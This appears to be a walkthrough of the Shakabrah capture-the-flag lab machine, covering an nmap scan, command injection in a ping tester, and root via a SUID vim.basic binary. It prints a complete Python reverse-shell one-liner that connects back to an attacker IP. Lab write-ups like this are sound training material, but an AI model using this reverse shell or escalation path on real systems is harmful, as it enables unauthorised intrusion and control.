Proving Grounds Play: Shakabrah Walkthrough
Let’s begin with an Nmap scan on this machine, unveiling two open ports — 80 (HTTP) and 22 (SSH). Our journey starts with the HTTP port, where we discover a command injection vulnerability that we can escalate to remote code execution (RCE).
By crafting a Python payload tailored to our IP and Port, we gain a foothold on the machine. Next, we dive into enumeration and spot a SUID binary, vim.basic, which we can exploit for root access.
Following the guidance from GTFOBins, we leverage vim.basic’s Python3 support to elevate our privileges and obtain a root shell.
Let’s start with the first things first, Do an nmap scan on the machine to see what ports are open and what services are running on the box.
Nmap scan report for 192.168.236.86
Host is up (0.15s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 33:b9:6d:35:0b:c5:c4:5a:86:e0:26:10:95:48:77:82 (RSA)
| 256 a8:0f:a7:73:83:02:c1:97:8c:25:ba:fe:a5:11:5f:74 (ECDSA)
|_ 256 fc:e9:9f:fe:f9:e0:4d:2d:76:ee:ca:da:af:c3:39:9e (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 79.23 secondsAs we can see there are 2 ports open on this machine. 80 HTTP and 22 SSH. Let’s enumerate port 80 first.
It looks like a connection tester which pings to the localhost. After exploring the host further it was Identified that it is vulnerable to command injection.
Now we can lead that command injection to RCE. Look for the pentestmonkey reverse shell payload list to achieve this.
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.x.x",80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")'Now customize this to as your IP and Port. And we got a shell on the machine.
Now let’s enumerate to get higher privileges.
Enumeration of SUID binaries shows us that vim.basic is SUID as root.
find / -perm -u=s -type f 2>/dev/null
/usr/bin/sudo
/usr/bin/pkexec
/usr/bin/gpasswd
/usr/bin/chfn
/usr/bin/traceroute6.iputils
/usr/bin/at
/usr/bin/chsh
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/newgidmap
/usr/bin/vim.basic
/usr/bin/newuidmap
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/lib/snapd/snap-confine
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/bin/umount
/bin/fusermount
/bin/ping
/bin/mount
/bin/suFrom https://gtfobins.github.io/gtfobins/vim/ we get several possible ways of getting a root shell.
Importantly, we also find from vim.basic -version that it has python3 support. With these two pieces of information we get a shell with a EUID of root.
Shakabrah is a fairly easy Play machine with a PWK lab feel to it suitable for beginners.
Stay tuned for next writeup.
